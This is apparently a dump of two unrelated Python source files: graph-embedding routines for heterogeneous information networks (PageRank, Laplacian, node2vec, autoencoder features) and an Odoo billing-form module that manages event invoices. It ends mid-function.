## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
converted = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
converted = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
graph = stochastic_normalization(converted) ## normalize
try:
targets = hin.label_matrix.todense() ## convert targets to dense representation..
except:
targets = hin.label_matrix
pass
n2v_embedded = get_n2v_embedding(graph,n2v_binary)
## get n2v embedding, pass on as result
return {'data' : n2v_embedded,'targets' : targets}
def generate_deep_embedding(X, target=None,
encoding_dim = 50,
reg=10e-5,
sample=1,
act="tanh",
epoch=400,
bsize=90):
from keras.layers import Input, Dense, Activation,ActivityRegularization
from keras.layers.advanced_activations import LeakyReLU
from keras.models import Model
from keras import regularizers
from keras.callbacks import EarlyStopping
ssize = int(X.shape[1]*sample)
idx = np.random.randint(X.shape[1], size=ssize)
if sample == 1:
tra = X
else:
tra = X[idx]
if target.any():
if sample == 1:
tar = target
else:
tar = target[idx]
## sample
i_shape = int(X.shape[0])
o_shape = int(target.shape[1])
print("Beginning training on {} and target {}".format(tra.shape,tar.shape))
## THE ARCHITECTURE ##
input_matrix = Input(shape=(i_shape,))
encoded = Dense(encoding_dim)(input_matrix)
reg1 = ActivityRegularization(l1=reg)(encoded)
if act == "lrelu":
activation = LeakyReLU()(reg1)
else:
activation = Activation(act)(reg1)
decoded = Dense(o_shape, activation='sigmoid')(activation)
## THE ARCHITECTURE ##
# this model maps an input to its reconstruction
autoencoder = Model(input_matrix, decoded)
encoder = Model(input_matrix, encoded)
autoencoder.compile(optimizer='adam', loss='binary_crossentropy')
print("finished deep model compilation..")
stopping = EarlyStopping(monitor='loss', patience=10, verbose=0, mode='auto')
if target.any():
autoencoder.fit(tra,tar,epochs=epoch,batch_size=bsize,shuffle=True,verbose=0,callbacks=[stopping])
else:
autoencoder.fit(tra,tra,epochs=epoch,batch_size=bsize,shuffle=True,verbose=0,callbacks=[stopping])
Xo = encoder.predict(X)
print("Encoding stage complete, current shape: {}".format(Xo.shape))
return (Xo,encoder)
def hinmine_laplacian(hin,use_decomposition=True,return_type="matrix",from_mat=False,verbose=True):
assert isinstance(hin, HeterogeneousInformationNetwork)
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
## if weighted != False;
## elementwise product with the ground thruth network
graph = hin.decomposed['decomposition']
else:
if from_mat:
graph = hin.graph
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
graph = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
graph = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
from scipy.sparse import csgraph
vectors = csgraph.laplacian(graph, normed=True)
try:
targets = hin.label_matrix.todense() ## convert targets to dense representation..
except:
targets = hin.label_matrix
pass
return {'data' : vectors.todense(),'targets':targets}
def hinmine_deep_gp(hin,use_decomposition=True,return_type="matrix",verbose=False,generate_edge_features = None, from_mat=False,outfile=None,graphlet_binary="./orca"):
assert isinstance(hin, HeterogeneousInformationNetwork)
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
## if weighted != False;
## elementwise product with the ground thruth network
graph = stochastic_normalization(hin.decomposed['decomposition'])
else:
if from_mat:
graph = hin.graph
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
converted = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
converted = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
graph = stochastic_normalization(converted) ## normalize
graphlets = count_graphlets_orca(graph,graphlet_binary)
try:
targets = hin.label_matrix.todense() ## convert targets to dense representation..
except:
targets = hin.label_matrix
pass
graphlets_embedded = deep_embedding_gp(graphlets,targets,nlayers=100)
return {'data' : graphlets_embedded,'targets' : targets}
def hinmine_embedding_gp(hin,use_decomposition=True,return_type="matrix",verbose=False,generate_edge_features = None, from_mat=False,outfile=None,graphlet_binary="./orca",deep_embedding=True):
assert isinstance(hin, HeterogeneousInformationNetwork)
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
## if weighted != False;
## elementwise product with the ground thruth network
graph = stochastic_normalization(hin.decomposed['decomposition'])
else:
if from_mat:
graph = hin.graph
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
converted = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
converted = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
graph = stochastic_normalization(converted) ## normalize
## .......................
## .......................
## local topology - graphlets
## .......................
## .......................
## raw data - initial setup
graphlets = count_graphlets_orca(graph,graphlet_binary)
targets = hin.label_matrix.todense() ## convert targets to dense representation..
from sklearn.model_selection import train_test_split
## train on small percent of the data
X_train, X_test, y_train, y_test = train_test_split(graphlets, targets, test_size=0.1, random_state=42)
autoencoders = [] ## model container
print("Beginning with recursive embeddings..")
for j in range(15): ## how many recursive embeddings
deeper_level_embedding, encoder = generate_deep_embedding(X_test, y_test)
autoencoders.append(encoder)
X_test = np.concatenate((X_test,deeper_level_embedding),axis=1)
## encript the rest of the data
print("Applying {} autoencoders..".format(len(autoencoders)))
## use trained autoencoders
for enc in autoencoders:
encoding = enc.predict(graphlets)
graphlets = np.concatenate((graphlets,encoding), axis=1)
print("Final shape:{}".format(graphlets.shape))
return {'data' : graphlets,'targets' : hin.label_matrix, 'decision_threshold' : 0.5}
def hinmine_embedding_pr(hin,use_decomposition=True, parallel=True,return_type="matrix",verbose=False, generate_edge_features = None,from_mat=False, outfile=None,feature_permutator_first="0000",deep_embedding=False,reorder_by_communities=False,simple_input=False,simple_weighted=False):
# fc_operators = []
## list of possible features
topology_operators = ["clustering_information",
"load_centrality_information",
"betweenness_centrality_information",
"community_information"]
## map t|f to individual operators
operator_bool = [True if x == "1" else False for x in feature_permutator_first]
## map to feature vectors
operator_map = dict(zip(topology_operators,operator_bool))
if verbose:
emit_state("Beginning embedding process..")
global graph ## this holds the graph being processes
if simple_input: ## use as a class
n = len(hin.nodes())
if simple_weighted != False:
graph = nx.to_scipy_sparse_matrix(hin,weight="weight")
else:
graph = nx.to_scipy_sparse_matrix(hin)
graph = stochastic_normalization(graph)
else: ## use within the hinmine
# embed the input network to a term matrix
assert isinstance(hin, HeterogeneousInformationNetwork)
## .......................
## Use decomposed network
## .......................
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
graph = stochastic_normalization(hin.decomposed['decomposition'])
## .......................
## Use raw, weighted network
## .......................
else:
if from_mat:
if verbose:
emit_state("Using matrix directly..")
graph = stochastic_normalization(hin.graph)
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
converted = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
converted = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
graph = stochastic_normalization(converted) ## normalize
## .......................
## .......................
## Graph embedding part
## .......................
## .......................
## use parallel implementation of PR
if parallel:
import mkl
mkl.set_num_threads(1) ## this ports process to individual cores
if verbose:
emit_state("Parallel embedding in progress..")
import multiprocessing as mp ## initialize the MP part
with mp.Pool(processes=mp.cpu_count()) as p:
results = p.map(pr_kernel,range(n)) ## those are the embedded vectors
## the baseline
else:
if verbose:
emit_state("Non-Parallel embedding in progress..")
results = []
for index in range(n):
pr = page_rank(graph, [index], try_shrink=True)
norm = np.linalg.norm(pr, 2)
if norm > 0:
pr = pr / np.linalg.norm(pr, 2)
results.append((index,pr))
if verbose:
emit_state("Finished with embedding..")
if operator_map["community_information"]:
## .......................
## .......................
## global topology - communities
## .......................
## .......................
if verbose:
emit_state("Mapping the community information..")
partition_sizes = return_communities(graph)
for k,v in partition_sizes.items():
for res in results:
if res != None:
res[1][k]*=v
if operator_map["load_centrality_information"]:
## .......................
## .......................
## global topology - basic load paths
## .......................
## .......................
centralities= return_load_centralities(graph)
for k,v in centralities.items():
for res in results:
if res != None:
res[1][k]*=v
if operator_map["betweenness_centrality_information"]:
## .......................
## .......................
## global topology - centrality
## .......................
## .......................
centralities= return_betweenness_centralities(graph)
max_cent = np.amax(centralities.values())
for k,v in centralities.items():
for res in results:
if res != None:
res[1][k]*=v
if operator_map["clustering_information"]:
## .......................
## .......................
## global topology - basic clustering
## .......................
## .......................
clusterings = return_clustering_coefficients(graph)
for k,v in clusterings.items():
for res in results:
if res != None:
res[1][k]*=v
if generate_edge_features != None:
emit_state("Generating edge-based features")
pass
if verbose:
emit_state("Writing to output..")
## a se kar tu natrenira? Threshold tudi?
if return_type == "matrix":
size_threshold = 100000
if n > size_threshold:
vectors = sp.csr_matrix((n, n))
else:
vectors = np.zeros((n, n))
for pr_vector in results:
if pr_vector != None:
if n > size_threshold:
col = range(0,n,1)
row = np.repeat(pr_vector[0],n)
val = pr_vector[1]
vectors = vectors + sp.csr_matrix((val, (row,col)), shape=(vdim[0],vdim[1]), dtype=float)
else:
vectors[pr_vector[0],:] = pr_vector[1]
try:
hin.label_matrix = hin.label_matrix.todense()
except:
pass
if deep_embedding:
if verbose:
emit_state("Generating the deep embedding..")
vectors, encoder = generate_deep_embedding(vectors, target = hin.label_matrix)
if simple_input:
return {'data' : vectors}
else:
return {'data' : vectors,'targets' : hin.label_matrix}
elif return_type == "file":
if outfile != None:
f=open(outfile,'a')
for rv in results:
if rv != None:
index = rv[0] ## indices
vals = rv[1] ## pagerank vectors
fv = np.concatenate(([index],vals))
outstring = ",".join([str(x) for x in fv.tolist()])+"\n"
f.write(outstring)
f.close()
else:
print("Please enter output file name..")
pass
else:
## return bo dodelan, verjetno zgolj dve matriki tho.
train_features = {
'data': vectors[hin.train_indices, :],
'target': hin.label_matrix[hin.train_indices, :],
'target_names': [str(x) for x in hin.label_list],
'DESCR': None
}
test_features = {
'data': vectors[hin.test_indices, :],
'target_names': [str(x) for x in hin.label_list],
'DESCR': None
}
return {'train_features': train_features, 'test_features': test_features}
class hinmine_embedding:
def __init__(self, method,augmentation="none"):
self.method = method
self.augmentation = augmentation
def learn_embedding(self, graph, is_weighted=True, edge_f=None, no_python=None):
if self.method == "pagerank":
results = hinmine_embedding_pr(graph,use_decomposition=True, parallel=True,return_type="matrix", outfile=None,feature_permutator_first="0000",simple_input=True,simple_weighted=is_weighted,verbose=True)
return (results['data'],True)
| [
"skrljblaz@gmail.com"
] | skrljblaz@gmail.com |
ea41d337a31b2b87ff214078d6af68efe6081d38 | b09f0db1feadd6b6f18c2590ff1eae9413409b5a | /bista_iugroup/billing_form.py | adb16992e9eadc25cdc50e62b17d685126f1f462 | [] | no_license | suningwz/IUG | fdb4a09ed742902b350dd99701ad694aaeb67dd7 | 87d44bc3321703e54e4ea29de1c32a2224235180 | refs/heads/master | 2022-12-02T23:03:18.397818 | 2020-08-14T08:51:33 | 2020-08-14T08:51:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74,232 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
import pytz
from odoo import netsvc
from odoo import models, fields,api
from odoo.tools.translate import _
from odoo import SUPERUSER_ID, tools
from odoo.exceptions import UserError, RedirectWarning, ValidationError
import logging
_logger = logging.getLogger(__name__)
class event_lines(models.Model):
_name="event.lines"
def get_partner_id(self):
for rec in self:
rec.partner_id=rec.event_id.partner_id.id
@api.multi
@api.depends('event_start_date')
def _compute_weekday_billing_form(self):
for rec in self:
if rec.event_start_date:
dt = rec.event_start_date
_logger.info(">>>>>>>>>>>>>>>>>>>dt dt %s>>>>>", type(dt))
year, month, day = (int(x) for x in dt.split('-'))
ans = datetime.date(year, month, day)
_logger.info(">>>>>ans ans>>>%s>>>", ans)
rec.weekday = ans.strftime("%A")
billing_form_id=fields.Many2one('billing.form', "Billing Form Id")
name=fields.Char('Group Name', size=128, index=True)
event_id=fields.Many2one('event', "Source Event Id")
state=fields.Selection(related='event_id.state', string="State" )
user_id=fields.Many2one(related='event_id.user_id', store=True, string="User Id" )
partner_id=fields.Many2one('res.partner',compute='get_partner_id', string="Billing Customer" )
ordering_contact_id=fields.Many2one(related='event_id.ordering_contact_id', string="Ordering Contact" )
event_start_date=fields.Date(related='event_id.event_start_date', store=True, string="Event Date" )
event_start_time=fields.Char(related='event_id.event_start_time', store=True, string="Event Start Time" )
event_end_time=fields.Char(related='event_id.event_end_time', store=True, string="Event End Time" )
# 'view_interpreter': fields.related('event_id','view_interpreter', type='many2one', relation='res.partner', string='Interpreter'),
assigned_interpreters=fields.Many2many(related='event_id.assigned_interpreters', string='Interpreters')
doctor_id=fields.Many2one(related='event_id.doctor_id', string='Doctor')
location_id=fields.Many2one(related='event_id.location_id', string='Location')
language_id=fields.Many2one(related='event_id.language_id', string='Language')
patient_id=fields.Many2one(related='event_id.patient_id', string='Claimant')
event_type=fields.Selection(related='event_id.event_type', store=True, string="Event Type" )
company_id=fields.Many2one(related='event_id.company_id', string='Company')
selected=fields.Boolean('Selected?')
weekday = fields.Char(compute='_compute_weekday_billing_form', string='Weekday', store=True)
    @api.multi
    def select_event(self):
        '''Select an event line for the invoicing flow.

        Builds the aggregated interpreter billing note, copies the event's
        invoicing data onto the linked billing.form record, marks the lines
        as selected and opens that billing form.  Returns the
        ir.actions.act_window of the first matching line (the loop exits
        via return).
        '''
        mod_obj = self.env['ir.model.data']
        billing_obj = self.env['billing.form']
        int_note = ''
        for line in self:
            if line.event_id and line.billing_form_id:
                # Concatenate "<name>:<br><billing comment><br>" per assigned
                # interpreter (unicode(): this module is Python 2).
                for interpreter in line.event_id.assigned_interpreters:
                    int_note = int_note + unicode(interpreter.complete_name) +':'+'<br>'+ (unicode(interpreter.billing_comment) if interpreter.billing_comment else '') +'<br>'
                # for interpreter in line.event_id.assigned_interpreters:
                #     int_note = interpreter.billing_comment or ''
                # Values pushed onto the linked billing.form record.
                val = {
                    'cust_invoice_id': line.event_id.cust_invoice_id and line.event_id.cust_invoice_id.id or False,
                    # 'supp_invoice_id': line.event_id.supp_invoice_id and line.event_id.supp_invoice_id.id or False,
                    'supp_invoice_id2': line.event_id.supp_invoice_id2 and line.event_id.supp_invoice_id2.id or False,
                    'selected_event_id': line.event_id.id,
                    'job_comment': line.event_id.comment or '',
                    'event_comment': line.event_id.event_note or '',
                    'billing_comment': int_note or '',
                    'customer_comment': line.event_id.partner_id and line.event_id.partner_id.billing_comment or '',
                    'event_line_id': line.id,
                    'event_start_hr': int(line.event_id.event_start_hr),
                    'event_start_min': int(line.event_id.event_start_min),
                    'am_pm': line.event_id.am_pm,
                    'event_end_hr': int(line.event_id.event_end_hr),
                    'event_end_min': int(line.event_id.event_end_min),
                    'am_pm2': line.event_id.am_pm2,
                    'event_start_date': line.event_id.event_start_date,
                    'invoice_date': line.event_id.event_start_date,
                    'emergency_rate': line.event_id.emergency_rate,
                }
                # Invoices count as "existing" only when both the customer and
                # at least one interpreter invoice are present.
                if line.event_id.cust_invoice_id and line.event_id.supp_invoice_ids:
                    val['invoice_exist'] = True
                else:
                    val['invoice_exist'] = False
                # if line.event_id.cust_invoice_id and line.event_id.cust_invoice_id.state in ('draft','open','paid'):
                #     val['cust_invoice_state'] = line.event_id.cust_invoice_id.state
                # if line.event_id.supp_invoice_id and line.event_id.supp_invoice_id.state in ('draft','open','paid'):
                #     val['supp_invoice_state'] = line.event_id.supp_invoice_id.state
                # NOTE(review): writes 'selected' on the whole recordset, not
                # only this line — presumably intentional; confirm.
                self.write({'selected': True})
                line.billing_form_id.write(val)
                # billing_obj.create_invoices(cr, uid, [line.billing_form_id], context=context)
                view_id = mod_obj.get_object_reference('bista_iugroup', 'view_billing_form')
                # Trailing comma makes res_id a 1-tuple; consumed as res_id[0] below.
                res_id = view_id and view_id[1] or False,
                return {
                    'name': _('Billing Form'),
                    'view_type': 'form',
                    'view_mode': 'form',
                    'view_id': [res_id[0]],
                    'res_model': 'billing.form',
                    'type': 'ir.actions.act_window',
                    'nodestroy': True,
                    'target': 'current',
                    'res_id': line.billing_form_id.id or False,
                    'flags': {'form': {'action_buttons': True, 'options': {'mode': 'edit'}}},
                }
        return True
class billing_form(models.Model):
    # Accounting working document: drives the invoicing flow of one selected
    # event (create / validate / pay / reset the customer, interpreter and
    # transporter invoices from a single screen).
    _description = 'Billing form for accounting user'
    _name = "billing.form"
    # mail.thread: chatter/followers; ir.needaction_mixin: menu "needs action" counters.
    _inherit = ['mail.thread', 'ir.needaction_mixin']
    _order = "name"
@api.depends('selected_event_id','cust_invoice_state','supp_invoice_state')
def _check_invoiced_state(self):
''' Function to check Invoice State of the selected Event'''
for bill_form in self:
if bill_form.selected_event_id and bill_form.selected_event_id.event_type == 'language':
if bill_form.cust_invoice_state and bill_form.cust_invoice_state == 'paid' \
and bill_form.supp_invoice_state and bill_form.supp_invoice_state == 'paid':
bill_form.selected_event_id.write({'state': 'done'})
if bill_form.cust_invoice_state and bill_form.cust_invoice_state == 'open' \
and bill_form.supp_invoice_state and bill_form.supp_invoice_state in ('open','paid'):
bill_form.selected_event_id.write({'state': 'invoiced'})
if bill_form.selected_event_id and bill_form.selected_event_id.event_type == 'transport':
if bill_form.cust_invoice_state and bill_form.cust_invoice_state == 'paid' \
and bill_form.supp_invoice_state2 and bill_form.supp_invoice_state2 == 'paid':
bill_form.selected_event_id.write({'state': 'done'})
# print "event transport write state++++++++",write
if bill_form.selected_event_id and bill_form.selected_event_id.event_type == 'lang_trans':
if bill_form.cust_invoice_state and bill_form.cust_invoice_state == 'paid' \
and bill_form.supp_invoice_state and bill_form.supp_invoice_state == 'paid' \
and bill_form.supp_invoice_state2 and bill_form.supp_invoice_state2 == 'paid':
# print "in 1st ifffff+++++++++++++"
bill_form.selected_event_id.write({'state': 'done'})
bill_form.all_invoiced= True
@api.depends('selected_event_id','supp_invoice_ids')
def _get_interpreter_invoice_line(self):
'''Function to get all interpreter invoices's lines '''
for billing_form in self:
line_ids = []
if billing_form.selected_event_id:
for invoice in billing_form.selected_event_id.supp_invoice_ids:
for line in invoice.invoice_line_ids:
line_ids.append(line.id)
billing_form.supp_invoice_lines = line_ids
def _set_interpreter_invoice_line(self):
''' Function used to make Interpreter invoice line Editable '''
pass
@api.depends('selected_event_id','cust_invoice_id')
def _get_customer_invoice_line(self):
'''Function to get customer invoices's lines '''
for billing_form in self:
line_ids = []
if billing_form.selected_event_id:
if billing_form.selected_event_id.cust_invoice_id:
billing_form.cust_invoice_id=billing_form.selected_event_id.cust_invoice_id.id
for line in billing_form.selected_event_id.cust_invoice_id.invoice_line_ids:
line_ids.append(line.id)
billing_form.cust_invoice_lines = line_ids
def _set_customer_invoice_line(self):
''' Function used to make customer invoice line Editable '''
pass
@api.depends('selected_event_id','supp_invoice_id2')
def _get_transporter_invoice_line(self):
'''Function to get transporter invoices's lines '''
for billing_form in self:
line_ids = []
if billing_form.selected_event_id:
for line in billing_form.selected_event_id.supp_invoice_id2.invoice_line_ids:
line_ids.append(line.id)
billing_form.supp_invoice_lines2 = line_ids
def _set_transporter_invoice_line(self):
''' Function used to make transporter invoice line Editable '''
pass
@api.depends('selected_event_id','supp_invoice_ids')
def _get_interpreter_invoice_state(self):
''' Function To get the Interpreter invoice State '''
for billing_form in self:
state = []
if billing_form.selected_event_id:
for invoice in billing_form.selected_event_id.supp_invoice_ids:
state.append(invoice.state)
if 'draft' in state:
final_state = 'draft'
elif 'open' in state:
final_state = 'open'
elif 'paid' in state:
final_state = 'paid'
else:
final_state = 'Not Exist'
billing_form.supp_invoice_state = final_state
@api.depends('selected_event_id', 'cust_invoice_id')
def _get_customer_invoice_state(self):
''' Function To get the Customer invoice State '''
for billing_form in self:
state = []
if billing_form.selected_event_id and billing_form.selected_event_id.cust_invoice_id:
billing_form.cust_invoice_state = billing_form.selected_event_id.cust_invoice_id.state
@api.depends('selected_event_id', 'supp_invoice_id2')
def _get_transporter_invoice_state(self):
''' Function To get the Transporter invoice State '''
for billing_form in self:
state = []
if billing_form.selected_event_id and billing_form.selected_event_id.supp_invoice_id2:
billing_form.supp_invoice_state2 = billing_form.selected_event_id.supp_invoice_id2.state
@api.depends('cust_invoice_lines','supp_invoice_lines','supp_invoice_lines2')
def _get_gross_profit(self):
''' Function To get the Interpreter invoice State '''
for billing_form in self:
profit = 0.0
for line in billing_form.cust_invoice_lines:
profit += line.price_subtotal
for line in billing_form.supp_invoice_lines:
profit -= line.price_subtotal
for line in billing_form.supp_invoice_lines2:
profit -= line.price_subtotal
billing_form.gross_profit= profit
@api.depends('cust_invoice_id')
def _get_invoice_comment(self):
''' Function to get invoice additional note '''
for billing_form in self:
if billing_form.cust_invoice_id:
billing_form.invoice_comment = billing_form.cust_invoice_id.comment
else:
billing_form.invoice_comment= ''
def _set_invoice_comment(self):
''' Function to make invoice additional note field editable '''
for billing_form in self:
if billing_form.cust_invoice_id:
billing_form.cust_invoice_id.comment=billing_form.invoice_comment
@api.depends('selected_event_id')
def _get_customer_comment(self):
''' Function to get Customer Billing Note field '''
for billing_form in self:
if billing_form.selected_event_id and billing_form.selected_event_id.partner_id:
billing_form.customer_comment= billing_form.selected_event_id.partner_id.billing_comment
else:
billing_form.customer_comment = ''
def _set_customer_comment(self):
''' Function to make Customer Billing Note field editable '''
for billing_form in self:
if billing_form.selected_event_id and billing_form.selected_event_id.partner_id:
billing_form.selected_event_id.partner_id.billing_comment=billing_form.customer_comment
@api.depends('selected_event_id')
def _get_rubrik_comment(self):
''' Function to get Customer Billing Note field '''
for billing_form in self:
if billing_form.selected_event_id and billing_form.selected_event_id.partner_id:
billing_form.rubrik = billing_form.selected_event_id.partner_id.rubrik
else:
billing_form.rubrik = ''
def _set_rubrik_comment(self):
''' Function to make Customer Billing Note field editable '''
for billing_form in self:
if billing_form.selected_event_id and billing_form.selected_event_id.partner_id:
billing_form.selected_event_id.partner_id.rubrik=billing_form.rubrik
@api.multi
def approve_event(self):
for event_ids in self:
event = event_ids.selected_event_id
if event:
if event.partner_id and event.partner_id.order_note != True:
raise UserError(_('Selected event does not require verification'))
elif event.partner_id and event.partner_id.order_note == True:
if event.verify_state == 'verified':
raise UserError(_('This event is already verified, and can be processed for invoicing'))
elif event.verify_state == False or None:
event.write({'verify_state':'verified'})
# return {
# 'type': 'ir.actions.client',
# 'tag': 'action_warn',#action_info
# 'name': _('Notification'),
# 'params': {
# 'title': 'Notification!',
# 'text': _('Event verified successfully!'),
# 'sticky': True,
# }
# }
return self.env.user.notify_warning(
message='Event verified successfully!', title='Notification', sticky=True,
show_reload=False, foo="bar")
return True
name=fields.Char('Group Name', size=128, index=True)
job_comment=fields.Text('Job Note')
event_comment=fields.Text('Event Note')
billing_comment=fields.Text('Billing Note')
customer_comment=fields.Text(compute='_get_customer_comment', inverse='_set_customer_comment',string="Customer Billing Note")
rubrik=fields.Text(compute='_get_rubrik_comment', inverse='_set_rubrik_comment',string="Rubrik")
# 'invoice_comment': fields.related('cust_invoice_id','comment', type="text", store=True, string="Invoice Add. Note", readonly=True,),
invoice_comment=fields.Text(compute='_get_invoice_comment', inverse='_set_invoice_comment',string="Invoice Add. Note")
invoice_exist=fields.Boolean('Invoice Exist', readonly=True,default=True)
event_start=fields.Datetime("Event Start Time" )
event_end=fields.Datetime("Event End Time")
event_start_date=fields.Date("Event Date", )
event_start_hr=fields.Integer("Event Start Hours", size=2, )
event_start_min=fields.Integer("Event Start Minutes", size=2, )
event_end_hr=fields.Integer("Event End Hours", size=2, )
event_end_min=fields.Integer("Event End Minutes", size=2, )
am_pm=fields.Selection([('am','AM'),('pm','PM')],"AM/PM", )
am_pm2=fields.Selection([('am','AM'),('pm','PM')],"AM/PM", )
customer_timezone=fields.Selection([('US/Pacific','US/Pacific'),('US/Eastern','US/Eastern'),('US/Alaska','US/Alaska'),('US/Aleutian','US/Aleutian'),('US/Arizona','US/Arizona')
,('US/Central','US/Central'),('US/East-Indiana','US/East-Indiana'),('US/Hawaii','US/Hawaii'),('US/Indiana-Starke','US/Indiana-Starke'),('US/Michigan','US/Michigan')
,('US/Mountain','US/Mountain'),('US/Samoa','US/Samoa')],'Customer TimeZone',)
user_id=fields.Many2one('res.partner', "Done By")
event_id=fields.Many2one('event', "Source Event Id")
selected_event_id=fields.Many2one('event', "Selected Event Id")
event_type=fields.Selection(related='selected_event_id.event_type',string="Event Type",store=False)
event_line_id=fields.Many2one('event.lines', "Source Billing Line Id")
event_lines=fields.One2many('event.lines','billing_form_id', 'Events')
task_lines=fields.One2many(related='selected_event_id.task_id.work_ids', string='Task Lines')
event_purpose=fields.Selection(related='selected_event_id.event_purpose', string='Event Purpose')
cust_invoice_id=fields.Many2one('account.invoice','Customer Invoice')
cust_invoice_lines=fields.One2many('account.invoice.line',compute='_get_customer_invoice_line',inverse = '_set_customer_invoice_line',string='Customer Invoice Lines')
# 'supp_invoice_lines': fields.related('supp_invoice_ids','invoice_line', type='one2many', relation='account.invoice.line', string='Interpreter Invoice Lines'),
# 'supp_invoice_id':fields.many2one('account.invoice','Interpreter Invoic
# e'),
supp_invoice_lines=fields.One2many('account.invoice.line',compute='_get_interpreter_invoice_line',inverse = '_set_interpreter_invoice_line',string = 'Interpreter Invoices')
supp_invoice_ids=fields.Many2many('account.invoice','billing_inv_rel','bill_form_id','invoice_id','Interpreter Invoices')
supp_invoice_lines2=fields.One2many('account.invoice.line',compute='_get_transporter_invoice_line',inverse = '_set_transporter_invoice_line', string='Transporter Invoice Lines')
supp_invoice_id2=fields.Many2one('account.invoice','Transporter Invoice')
all_invoiced=fields.Boolean(compute='_check_invoiced_state', string = 'All Invoiced',default=False)
cust_invoice_state=fields.Char(compute=_get_customer_invoice_state,string="Customer Invoice State")
supp_invoice_state=fields.Char(compute=_get_interpreter_invoice_state,string = 'Interpreter Invoice State')
supp_invoice_state2=fields.Char(compute=_get_transporter_invoice_state, string="Transporter Invoice State")
company_id=fields.Many2one('res.company', 'Company', index=1 ,required=True,default=lambda self: self.env['res.company']._company_default_get('billing.form'))
gross_profit=fields.Float(compute='_get_gross_profit', string='Gross Profit')
invoices_created=fields.Boolean('Invoices Created')
invoice_date=fields.Date('Invoice Date')
emergency_rate=fields.Boolean('Emergency Rate')
    @api.multi
    def update_invoices(self):
        ''' Function to Update Invoices for the selected event. It recalculate the Invoice Lines '''
        # Recomputes every invoice line of the selected event from its task
        # line, after zeroing the manual 'total_editable' override.
        line_obj = self.env['account.invoice.line']
        task_obj = self.env['project.task']
        cur_obj = self
        # code start
        # NOTE(review): raw SQL + explicit commit bypasses the ORM cache and
        # commits mid-transaction; kept as-is but worth revisiting.
        cust_invoice_lines=self.cust_invoice_lines
        for each in cust_invoice_lines:
            self._cr.execute('update account_invoice_line set total_editable =%s where id=%s', (0.0, each.id))
            self._cr.commit()
        supp_invoice_lines=self.supp_invoice_lines
        for each in supp_invoice_lines:
            self._cr.execute('update account_invoice_line set total_editable =%s where id =%s', (0.0, each.id))
            self._cr.commit()
        # code end
        if cur_obj.selected_event_id:
            if not cur_obj.selected_event_id.cust_invoice_id or not cur_obj.selected_event_id.supp_invoice_ids:
                raise UserError(_('Invoice are not yet generated for this event!'))
            # --- customer invoice lines ---
            if cur_obj.selected_event_id.cust_invoice_id:
                for line in cur_obj.selected_event_id.cust_invoice_id.invoice_line_ids:
                    if line.task_line_id:
                        inv_line_data = {}
                        if line.task_line_id.task_for == 'interpreter':
                            if not line.task_line_id.interpreter_id:
                                continue
                            # interpreter passed via context for rate lookup
                            self=self.with_context(interpreter=line.task_line_id.interpreter_id)
                            inv_line_data = task_obj._prepare_inv_line_interpreter_for_customer(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
                                                                                line.product_id)
                        elif line.task_line_id.task_for == 'transporter':
                            if not line.task_line_id.transporter_id:
                                continue
                            inv_line_data = task_obj._prepare_inv_line_transporter_for_customer(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
                                                                                line.product_id)
                        line.write(inv_line_data)
            # --- interpreter (supplier) invoice lines ---
            for invoice in cur_obj.selected_event_id.supp_invoice_ids:
                for line in invoice.invoice_line_ids:
                    if line.task_line_id:
                        inv_line_data = {}
                        if line.task_line_id.task_for == 'interpreter':
                            if not line.task_line_id.interpreter_id:
                                continue
                            self = self.with_context(interpreter=line.task_line_id.interpreter_id)
                            inv_line_data = task_obj._prepare_inv_line_interpreter(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
                                                                                line.product_id)
                        elif line.task_line_id.task_for == 'transporter':
                            if not line.task_line_id.transporter_id:
                                continue
                            inv_line_data = task_obj._prepare_inv_line_transporter(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
                                                                                line.product_id)
                        line.write(inv_line_data)
            # --- transporter invoice lines ---
            if cur_obj.selected_event_id.supp_invoice_id2:
